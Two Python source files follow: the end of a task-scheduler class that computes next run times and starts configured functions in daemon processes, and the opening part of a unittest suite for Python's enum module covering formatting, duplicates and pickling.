seconds = [int(i)-time_now.weekday()-1 for i in split[0].split(',')]
seconds = [(datetime.datetime(time_now.year, time_now.month, time_now.day, int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
)+datetime.timedelta(days=7+i if i<0 else i)
).timestamp()-time_now.timestamp()
for i in seconds]
if max(seconds)<40:
seconds= 604800+min(seconds)
else:
seconds = [i for i in sorted(seconds) if i>=40][0]
elif self.config[name]['mode']=='every_month':
split = self.config[name]['time'].split(':')
seconds = [datetime.datetime(time_now.year, time_now.month, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
if time_now.month<12:
seconds += [datetime.datetime(time_now.year, time_now.month+1, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
else:
seconds += [datetime.datetime(time_now.year+1, 1, int(i), int(split[1]),
int(split[2]), int(split[3]), time_now.microsecond
) for i in split[0].split(',')]
seconds = [i.timestamp()-time_now.timestamp() for i in seconds]
seconds = [i for i in sorted(seconds) if i>=40][0]
self.config[name]['time_next'] = time_now+datetime.timedelta(seconds=seconds)
self.config[name]['time_record'] = time_now
def run(self):
time_now = datetime.datetime.now()
if self.params.config_file is not None:
config = Config(file_py=self.params.config_file)
for name in config.config:
self.config[name] = config.config[name]
self.config[name]['execute_num'] = 0
self.config[name]['runner'] = (self.config[name]['function'], self.config[name]['args'],
self.config[name]['kwargs'], name)
self.config[name]['time_init'] = time_now
for name in self.config:
self._reset_time(name, time_now)
if self.params.verbose:
self.params.logger.info(f'New task {name} has been added.', write_file=True)
while True:
time_now = datetime.datetime.now()
for name in self.config:
if self.config[name]['time_next']>time_now:
self.config[name]['time_record'] = time_now
else:
self._start(self.config[name]['runner'])
self._reset_time(name, time_now)
self.config[name]['execute_num'] += 1
try:
if self.params.config_file is not None:
config = Config(file_py=self.params.config_file)
for name in config.config:
if name not in self.config:
self.config[name] = config.config[name]
self.config[name]['execute_num'] = 0
self.config[name]['time_init'] = time_now
self._reset_time(name, time_now)
if self.params.verbose:
self.params.logger.info(f'New task {name} has been added.', write_file=True)
for i,j in config.config[name].items():
self.config[name][i] = j
self.config[name]['runner'] = (self.config[name]['function'], self.config[name]['args'],
self.config[name]['kwargs'], name)
except Exception as msg:
if self.params.verbose:
self.params.logger.info(str(msg), write_file=True)
def _run(self, runner):
"""Runs function runner """
output, error, got_error = None, None, False
started = datetime.datetime.now()
try:
output = runner[0](*runner[1], **runner[2])
except Exception as e:
got_error = True
error = str(e)
finally:
finished = datetime.datetime.now()
self.params.tracker_dict[runner[3]] = {
"output": output,
"started_time": started,
"finished_time": finished,
"execution_time": (finished - started).total_seconds(),
"got_error": got_error,
"error": error}
msg = (f'task {runner[3]} started_time: {str(started)[:19]}, finished_time: {str(finished)[:19]}, '+
f'execution_time: {round((finished - started).total_seconds(),4)}s, got_error: {got_error}, error: {error}.')
if self.params.verbose:
self.params.logger.info(msg, write_file=True)
elif self.params.logger is not None:
self.params.logger.write(msg)
def _start(self, runner):
"""Starts runner process """
self.params.runner_dict[runner[3]] = multiprocessing.Process(target=self._run, args=(runner,))
self.params.runner_dict[runner[3]].daemon = True
self.params.runner_dict[runner[3]].start()
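# Usage sketch (illustrative only): the instance and helper names below are
# assumptions for demonstration -- the scheduler class itself is defined above,
# but how it is constructed (config_file, logger, verbosity) depends on the
# surrounding library and is not shown here.
#
# def refresh_cache():
#     print('cache refreshed')
#
# scheduler = TaskScheduler()                                # hypothetical constructor name
# scheduler.every_hour('30:27', refresh_cache)               # minute 30, second 27 of every hour
# scheduler.every_day('08:30:27', refresh_cache)             # 08:30:27 every day
# scheduler.every_week('1,3,7:08:30:27', refresh_cache)      # Mon, Wed, Sun at 08:30:27
# scheduler.every_month('1,13,27:08:30:27', refresh_cache)   # 1st, 13th, 27th at 08:30:27
# scheduler.run()                                            # blocks; runs each due task in a child process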
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertEqual(f'{self.Grades.B}', 'B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
class Grades(int, Enum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
